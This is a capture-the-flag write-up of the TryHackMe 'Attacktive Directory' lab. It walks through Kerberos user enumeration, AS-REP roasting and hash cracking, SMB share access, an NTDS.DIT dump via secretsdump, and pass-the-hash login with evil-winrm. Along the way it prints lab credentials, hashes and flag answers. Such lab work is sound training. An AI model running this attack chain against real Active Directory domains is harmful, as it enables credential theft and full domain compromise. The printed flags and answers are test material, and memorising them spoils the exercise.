Attacktive Directory TryHackMe Writeup by SyntheticVoid
Attacktive Directory — https://tryhackme.com/room/attacktivedirectory
The following is my write up of how I solved and finished the Attacktive Directory TryHackMe , “99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller?”
Task 3:
1. What tool will allow us to enumerate port 139/445?
enum4linux , comes preinstalled with most versions of linux
2. What is the NetBIOS-Domain Name of the machine?
enum4linux -a 10.10.70.170
nmap -A 10.10.70.170
Found: spookysec.local0 / ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
NetBIOS_Domain_Name: THM-AD
3. What invalid TLD do people commonly use for their Active Directory Domain?
.tld
Task 4:
· Installed go with the following steps: https://medium.com/@startswithme22/how-to-install-go-programming-language-on-linux-c7835698f3a0
· Then installed the Kerbrute with:
· install github.com/ropnop/kerbrute@latest
· Navigate to cd: ~/go/bin
· Then you can launch commands with it via:
o ./kerbrute –help , etc
1. What command within Kerbrute will allow us to enumerate valid usernames?
Userenum
2 & 3. What notable account is discovered:
cd ~/go/bin
Run: sudo ./kerbrute userenum — dc 10.10.28.244 -d spookysec.local userlist.txt -t 100
You have to use the IP first to make the command know where you are specifying , if we wanted to associated the IP with the domain we could run something like:sudo /bin/sh -c 'echo "10.10.141.109 spookysec.local" >> /etc/hosts'svc-admin / backup
Task 5
1. We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
a. svc-admin
2. Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
a. Kerberos 5, etype 23, AS-REP
- Got here with the following command:
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py spookysec.local/svc-admin -no-pass
- We then get : $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:54eb8ddb81888cc5c8838ca42443c0aa$0e719141fc76ecdae558ad24fa980704f86f2d4f63b0691123e3be1590becbff97f72c42756e52c6a07dba7cfb7c574b8d6f855ad461ed83f12a0a25b6354dec6849d3bed34721409be836d8f16fa7ce7e22b95bbbdc27f58a7cdd40efb6fc10b7ca8f2cfdce8d1ddcc4078e4ba8ae32d4e083a011147f0bd2c5225ca2eb0ff47fadfcd8979aa67e99cf457abd3d6d2fba786a8d01ebbfb10e1b1c6c6df5a5ab5b1dff730873fc4b05888e742eccaed7cfdcb2aca58c99a452aee9aa3db5e78c7f0b5f8150a9d08f4a75c9cfad47f00378b7369baff46f758c13f7b112563d51075c5918d15e88e6ca883d1530ea31713abc
- After reviewing : https://hashcat.net/wiki/doku.php?id=example_hashes we find the matching hash name is : $krb5asrep$23$ , which corresponds to : $krb5asrep$23$svc-
3. What mode is the hash?
a. 18200
4. Now crack the hash with the modified password list provided, what is the user accounts password?
a. management2005
We create a hash file with the following command:
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py spookysec.local/svc-admin -no-pass > /home/admin2/THEHASH
- This creates a file named THEHASH with the hash inside it, from here we can run the following:
sudo hashcat -m 18200 /home/admin2/THEHASH passwordlist.txt — force
- This outputs:
- After reviewing the ReadMe for — https://github.com/ropnop/kerbrute/blob/master/README.md Kerbrute, I found the following , “Bruteforcing windows passwords with Kerberos is much faster than any other approach, and potentially stealthier since pre authentication failures do not trigger that traditional “an account failed to log on” event 4625. With Kerberos , you can validate a username or test a login by only sending one UDP frame to the KDC (Domain Controller)
Task 6
1. What utility can we use to map remote SMB shares?
a. Smbclient
2. Which option will list shares?
a. -L
3. How many remote shares is the server listing?
a. 6
We find this with the following command:
smbclient -L 10.10.158.253 -U THM-AD/svc-admin%management2005
4. There is one particular share that we have access to that contains a text file. Which share is it?
a. Backup
We find this with the following command which will let us access the folder:
smbclient \\\\10.10.158.253\\backup -U THM-AD/svc-admin%management2005
5. What is the content of the file?
a. YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
We find this with the following command:
· help
· found: get, that seems promising since wget isn’t working
· get backup_credentials.txt
· Navigate to local kali vm:- cat backup_credentials.txt
· Answer: YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
6. Decoding the contents of the file, what is the full contents?
a. backup@spookysec.local:backup2517860
· Open cyberchef, decode base 64
Task 7
1. What method allowed us to dump NTDS.DIT?
cd /opt/impacket/examples
sudo python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -just-dc backup@10.10.141.109
Pass: backup2517860
2. What is the Administrators NTLM hash?
We find: Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc::: the second series of numbers , so it’s: 0e0363213e37b94221497260b0bcb4fc
3. What method of attack could allow us to authenticate as the user without the password?
· Pass the hash
4. Using a tool called Evil-WinRM what option will allow us to use a hash?
Installed with: gem install evil-winrm
Task 8
1. Get flag for svc-admin : TryHackMe{K3rb3r0s_Pr3_4uth}
sudo evil-winrm -i 10.10.141.109 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
- For some reason it wouldn’t let me log in with svc-admin ntm hash, only Admin
2. Get flag for backup : TryHackMe{B4ckM3UpSc0tty!}
3. Get flag for Administrator : TryHackMe{4ctiveD1rectoryM4st3r}
